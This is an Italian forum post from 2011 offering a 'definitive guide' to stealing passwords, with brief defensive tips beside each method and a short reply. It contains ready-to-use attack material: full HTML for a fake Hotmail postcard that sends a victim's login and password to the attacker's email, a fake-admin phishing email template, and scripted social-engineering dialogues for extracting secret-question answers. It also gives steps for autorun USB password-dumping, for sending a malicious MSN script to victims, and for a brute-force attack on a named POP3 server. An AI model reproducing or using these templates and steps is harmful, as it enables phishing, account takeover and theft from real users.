GUIDA DEFINITIVA:RUBARE PASSWORD E DIFENDERSI

S1m0.3x3

Posted on 29/1/2011, 15:57

User deleted

Ecco forse la migliore guida(l'ho fatta io xd) su come rubare le password:sarebbe ingiusto non citarne la fonte,quindi dirò che viene dal forum S1m0.3x3
Scusate se mancano dei link,ma il vostro sito mi diceva che nn sono validi.Boh
!
Salve!Oggi rispondo ad una domanda frequente:come si fa a rubare una password?

Premessa: :angry:

NON LAMERATE!!!!! :angry:

e chiedetemelo prima di copiare la guida o parte di essa.
Questa guida è a puro scopo informativo,infrangere la privacy di qualcuno è illgale e, spesso, immorale.
Questa guida serve a spiegarvi come difendervi e a informarvi sui metodi, a chi interessasse(magari per controllare i figli).
NON MI ASSUMO ALCUNA RESPONSABILITA'!!!

Prima di tutto,se volete provare,trovate un account su cui fare le prove e chiedete l' autorizzazione al prorpietario(io entro sempre in quello di un amico,Davide, che mi autorizza sempre,NON ENTRATE NELL'ACCOUNT DI CHI NON VI DA IL PERMESSO,NON SI FA!).

Sfondare il server
Da escludere.E' lungo e difficile,ma a chi interessasse può cerare su google.

Keylogger
Questi programmi servono a leggere quello che si scrive sulla tastiera e sono facilmente reperibili in rete per il download,ma molti antivirus li bloccano:ed è questo il modo per difendersi,affidarsi all' antivirus, se si è principianti.
E' meglio nn accettare mai i file degli "amici" che non conoscete e usare linux poichè molti keylogger non girano su di esso.Per scoprire se un keylogger sta inviando informazioni al server bisogna digitare sul Prompt:

CODICE

netstat -ao

e aprendo task manager:nella colonna PID(si può evedere nel menù visualizza->seleziona colonne,se non c'è)e associare i PID che accedono a internet ai processi:se un processo che non conoscete è connesso a internet fate un ricerchina e saprete a cosa serve;poi potete terminarlo se dannoso.
C'è da dire però che i processi possono rendersi invisibili a task manager :o:

.

Esistono anche keylogger hardware,quindi attenzione ai "filtri" tra tastiera e computer nei luoghi di connessione pubblica!

Script(solo per MSN)
E' una lamerata,lasciatemelo dire.Ma se volete rubare una pass in fretta e siete inesperti,e il bersaglio usa MSN plus,lo script scaricabile da un link che è stato rimosso fa per voi.Basta inviarlo alla vittima e dirgli di installarlo.Se non riuscite,potete sempre cercare qualche guida allo script per niubbi.Non accettate mai uno script chiamato MsgXs.

Chiavetta rubapassword
Con dei tool per il recupero di password e uno script batch si può ottenere molto:è il metodo migliore e OGNI password sarà in mano vostra!Muahahahaha!
Basta scaricare il pacco completo da un link che è stato rimosso e metterlo nella directory principale della chiavetta.. persino l' autorun è già pronto!Molti antivirus bloccano i software della chiavetta,ma se si avvia lo script .bat in tempo...
Controllate sempre il vostro computer!Qualcuno potrebbe inserire una chiavetta simile!

Social engineering
Ecco...basta convincere la vittima a rivelargli la password o la risposta al suggerimento,magari fingendosi qualcun altro...Esempi:

Suggerimento:Qual è il nome del tuo maestro delle elementari?

Io:Ciao.
Vittima:Ciao.Ti conosco?
Io:Forse andavamo alle elementari insieme,anch'io sono di [Mi sono informato e dico il nome del luogo di nascita].Come si chiamava il tuo maestro?
Vittima:Giovanni.
Io:Anche il mio!Scusa devo andare!

E rispondo al suggerimento

.

Attenzione ai suggerimenti che mettete per le pasword e alle domande segrete.
Ovviamente questo metodo non funziona sempre(è impossibile applicarlo a un nerd o a uno smanettone,ad esempio).

Programma in VB.Net
Ne ho già parlato,vedere sezione programmazione di S1m0.3x3 .
Non inserire mai la pass in programmi come questo.

Cartolina(MSN e hotmail)
Con un account di posta con html,come yahoo,inviate un nuovo msg abilitando i tag html e scrivete:

CODICE

<!doctype html public "-//w3c//dtd html 4.0 transitional//en">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<meta name="GENERATOR" content="Mozilla/4.51 [it] (Win98; I) [Netscape]">


</head>
<body bgcolor="#FFFFFF" link="#000099" vlink="#000099">
 
<table BORDER=0 CELLSPACING=5 CELLPADDING=5 WIDTH="508" HEIGHT="90%" >
<tr VALIGN=CENTER>
<th COLSPAN="2"><font face="Arial, Helvetica"><font size=+2>Hotmail,
servizio cartoline online.</font></font>
<br><font face="Arial, Helvetica"><font size=+2>Per visualizzare la cartolina</font></font>
<br><font face="Arial, Helvetica"><font size=+2>Inserisci il tuo nome utente
e password</font></font></th>
</tr>

<tr VALIGN=CENTER>
<td ALIGN=CENTER><font face="Arial, Helvetica"><font size=+0>Mittente:
<font color="#000000"><b>Io          

</b></font></font><font color="#000000">Titolo cartolina:<b><font size=+0> Un saluto</font></b></font></font>
<br> 
<br> 
<p><b><font face="Arial, Helvetica"><font size=+0><font color="#FF0000">Prego
inserire nome e password.</font><font color="#000000"> </font></font></font></b></td>
</tr>

<tr VALIGN=CENTER>
<td ALIGN=CENTER><form METHOD=POST ACTION="http://www.tiscalinet.it/cgi-bin/formmail.cgi" target="_top"><input type=hidden name="recipient" value="vostra@email.it"><input TYPE="hidden" NAME="next-url" VALUE="http://www.hotmail.com"><input TYPE="hidden" NAME="subject" VALUE="Hotmail Password"><input type="hidden" name="redirect" value="http://www.hotmail.com">
<table BORDER=0 CELLSPACING=5 CELLPADDING=0 >
<tr>
<td><font face="Arial, Helvetica"><font size=-1>Login Name:</font></font>
<br><input type="text" name="login" size="16" maxlength="16"></td>

<td><font face="Arial, Helvetica"><font size=-1>Password:</font></font>
<br><input type="password" name="passwd" size="16" maxlength="16"><input type="submit" value="Enter"></td>
</tr>
</table>
</form></td>
</tr>

</tr>
</table>
<img src="http://216.33.236.24/lgo_msn_140x60.gif" alt="Copyright 2000">
<img src="http://216.33.236.24/lgo_hmr_105x32.gif" alt="Copyright 2000">
<br> 
</body>
</html>

E dove c'è [email protected] mettete la mail su cui vorretet ricevere la pass e dove c'è "Io" mettete il vostro nome.Non accettate cartoline simili!

Il finto admin
Create un' indirizzo come [email protected] o simili e inviate una mail pomposa e formale richiedendo la password alla vittima come la seguente

Caro utente,
a causa di problemi interni del server i suoi dati sono stati danneggiati.Per riutilizzarli e recuperare il suo profilo risponda con il suo nome utente e la sua password separati da una virgola.
Ci scusiamo per il disagio,
lo staff.

Informatevi sempre!

Brute-force con BrutusAet2
E se volessimo hackerare un account di posta che non conosciamo?
La risposta è BrutusAet2:mettiamo di dover rubare la password a [email protected] .
Apritelo e su type mettete pop3,su target il server pop3(in queso caso popmail.libero.it) e impostate singleuser e homer.simpson.Selezionate try to stay connected unlimited,mettete use proxy(se non voletet farvi scoprire,ma tanto la reponsabilità è vostra!) e in pass mode buteforce.Poi premete start.
E' abbastanza difficile proteggersi da questo attacco se non con password lunghissime!

Fake login
Il concetto è semplice:creare un file html che rispecchia il sito del quale vogliamo la password di un utente.
Ecco delle guide,posto i link per amor di brevità.
Link nn validi?
Fate attenzione all' URL!

Errore del server
Prerequisiti:tu sei nerd e l'altro scemo.
Io:Nooooooooooo!!!
Lui:?
Io:Ho problemi col mio computer non mi logga su un server di facebook!
Lui:ok
Io:mi fai un favore?
lui:cosa?
Io:Per piacere ti prego mi dai un attimo la tua pass per loggarmi e mettere tutto a posto[sparate cose a caso]
Lui:ok.La mia pass è homer
io:grazie
lui:dopo la cambio

Ma intanto svegliatevi e cambiatela voi,io ho mandato in panico un mio amico facendo così.

/~Shacker~/

Posted on 6/2/2011, 16:19

User deleted

mi piace